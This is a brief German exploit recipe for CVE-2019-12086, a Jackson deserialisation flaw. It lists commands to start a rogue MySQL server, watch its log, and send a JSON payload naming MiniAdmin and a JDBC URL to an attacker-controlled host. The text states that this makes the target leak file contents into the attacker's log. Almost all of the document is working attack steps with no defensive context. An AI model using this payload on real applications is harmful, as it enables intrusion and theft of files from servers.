
jackson unserialize
CVE-2019-12086 Jackson Deserialisierung
1、Starten Sie den bösartigen MySQL-Server:
python rogue_mysql_server.py
2、Im selben Verzeichnis mysql.log anzeigen:
tail -f mysql.log
3、Senden Sie folgendes JSON an die anfällige Anwendung:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Wenn Jackson die bösartige JSON-Zeichenfolge deserialisiert, stellt es eine Verbindung zum bösartigen MySQL-Server her, und der gelesene Dateiinhalt wird in die mysql.log des bösartigen Servers geschrieben.